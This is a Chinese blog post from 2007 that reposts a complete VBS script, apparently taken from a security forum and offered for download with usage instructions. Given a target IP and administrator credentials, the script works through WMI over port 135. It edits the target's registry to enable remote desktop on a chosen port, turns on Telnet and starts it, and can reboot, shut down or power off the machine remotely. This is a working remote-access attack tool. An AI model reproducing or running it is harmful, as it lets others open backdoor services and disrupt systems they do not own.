一段 VBS 脚本

    [雷阵雨 September 19, 2007 14:02 | by ]
冷漠PS:在CISSP论坛看到有人贴出来的一段 VBS 脚本,作用是 :可以通过135端口开特telnet,也就是说只要开了135有了系统管理员帐号密码连3389都可以开,一共有三个功能:开3389,开telnet,开关机...

on error resume next
set xsjd=wscript.stdout
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
change=wscript.arguments(0)
ip=wscript.arguments(1)
user=wscript.arguments(2)
pass=wscript.arguments(3)
main()
xsjd.write "连接 "&ip&"中 ...."
select case change
case "1"
set objwmi=createobject("wbemscripting.swbemlocator")
set objwmiservices=objwmi.connectserver(ip,"root/cimv2",user,pass)
wscript.echo "您选择的服务是打开目标主机的终端服务."
if wscript.arguments.count<4 then
wscript.echo "没有足够的参数."
wscript.quit
end if
if wscript.arguments.count<4 then
port=3389
else
port=wscript.arguments(4)
end if
if not isnumeric(port) or port<1 or port>65000 then
wscript.echo "端口错误."
wscript.quit
end if
if wscript.arguments.count>5 then
reboot=wscript.arguments(5)
else
reboot=""
end if
objwmiservices.security_.privileges.add 23,true
objwmiservices.security_.privileges.add 18,true
error(err.number)
xsjd.write "检查超作系统类型...."
set objcxwql=objwmiservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in objcxwql
if instr(objinstoscaption.caption,"Server")>0 then
wscript.echo "OK!"
else
wscript.echo "超作系统是: "&objinstoscaption.caption
xsjd.write "你确认要结束?[y/n]"
strcancel=instreem.read
if lcase(strcancel)<>"n" then wscript.quit
end if
next
xsjd.write "正在打开服务请稍后 ...."
set objwmiinstreg=objwmi.connectserver(ip,"root/default",user,pass).get("stdregprov")
HKLM=&h80000002
with objwmiinstreg
.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
.setstringvalue HKLM,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
error(err.number)
rebt=lcase(reboot)
if rebt="c" then
xsjd.write "重新启动目标计算机...."
strwql="select * from win32_operatingsystem where primary='true'"
set wqlstances=objwmiservices.execquery(strwql)
for each objinstance in wqlstances
objinstance.win32shutdown(6)
next
error(err.number)
else
wscript.echo "您的帐号需要足够的权限."&vbcrlf&""
end if
wscript.echo "服务打开,,您可以连接终端服务在: "&port&" . 祝您好运!"
wscript.quit
case "2"
if wscript.arguments.count<6 then
wscript.echo "开启telnet的参数不够."
wscript.quit
end if
ntlm=wscript.arguments(4)
port=wscript.arguments(5)
if not isnumeric(port) or port<1 or port>65000 then
wscript.echo "端口错误."
wscript.quit
end if
if not isnumeric(ntlm) or ntlm<0 or ntlm>2 then
main()
wscript.echo "NTML终端类型出错."
wscript.quit
end if
set objwmi=createobject("wbemscripting.swbemlocator")
set objwmiservices=objwmi.connectserver(ip,"root/default",user,pass)
error(err.number)
xsjd.write "设置终端类型为:NTLM="&ntlm&"...."
set objwmistance=objwmiservices.get("stdregprov")
set objwmimethod=objwmistance.methods_("SetDWORDvalue")
set objwmiinparam=objwmimethod.inparameters.spawninstance_()
objwmiinparam.hdefkey=&h80000002
objwmiinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0"
objwmiinparam.svaluename="NTLM"
objwmiinparam.uvalue=ntlm
set objwmioutparam=objwmistance.execmethod_("SetDWORDvalue",objwmiinparam)
error(objwmioutparam.returnvalue)

xsjd.write "设定telnet端口: port="&port&"...."
objwmiinparam.svaluename="TelnetPort"
objwmiinparam.uvalue=port
set objwmioutparam=objwmistance.execmethod_("SetDWORDvalue",objwmiinparam)
error(objwmioutparam.returnvalue)

xsjd.write "查询telnet服务状态中...."
set objwmiservices=objwmi.connectserver(ip,"root\cimv2",user,pass)
set wqlstances=objwmiservices.execquery("select * from win32_service where name='tlntsvr'")
error(err.number)
for each objwmiinstance in wqlstances
if objwmiinstance.startmode="Disabled" then
xsjd.write "telnet服务没有打开,尝试更换启动方式"
set objwmimethod=objwmiinstance.methods_("changemode")
set objwmiinparam=objwmimethod.inparameters.spawninstance_()
objwmiinparam.startmode="Manual"
set objwmioutparam=objwmiinstance.execmethod_("changemode",objwmiinparam)
error(objoutparam.returnvalue)
end if
xsjd.write "打开服务...."
if objwmiinstance.started=true then
intstatus=objwmiinstance.stopservice()
error(intstatus)
wscript.echo "尝试关闭服务成功."
else
intstatus=objwmiinstance.startservice()
error(intstatus)
wscript.echo "成功打开服务!"
end if
next
case "3"
if wscript.arguments.count<5 then
wscript.echo "没有足够的参数."
wscript.quit
end if
intface=wscript.arguments(4)
select case intface
case "r"
flag=2
show="重新启动"
case "s"
flag=1
show="关机"
case "l"
flag=0
show="注销"
case "p"
flag=8
show="掉电"
case "fr"
flag=6
show="强制重启"
case "fs"
flag=5
show="强制关机"
case "fl"
flag=4
show="强制注销"
case "fp"
flag=12
show="强制掉电"
case else
main()
wscript.echo "参数错误"
wscript.quit
end select
xsjd.write ""&strshow&"目标计算机...."
strwql="select * from win32_operatingsystem where primary='true'"
set wqlstances=objwmiservices.execquery(strwql)
for each objinstance in wqlstances
objinstance.win32shutdown(flag)
next
error(err.number)
end select
function main()
wscript.echo string(99,"*")
wscript.echo "dsds v1.01"
wscript.echo "远程打开终端服务或者telnet服务, by dsds8152"
wscript.echo "copyright:www.xren.net"
wscript.echo "使用说明:"
wscript.echo "cscript "&wscript.scriptfullname&" n targetIP username password (NTLM) (port) (-c)"
wscript.echo "括号为选添项目"
wscript.echo " n的数值为1,或者2,1为开启终端服务,2为开启telnet服务,3:远程计算机状态(选择r:重启)"
wscript.echo " s:关机"
wscript.echo " l:注销"
wscript.echo " p:关闭电源"
wscript.echo " 谢谢您的使用"
wscript.echo string(99,"*")&vbcrlf
end function
function error(errornumber)
if errornumber<>0 then
wscript.echo "Error!"
wscript.quit
else
wscript.echo "成功!"
end if
end function


Download ( 725 downloads)
Technology | Comments(0) | Trackbacks(0) | Reads(9941)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive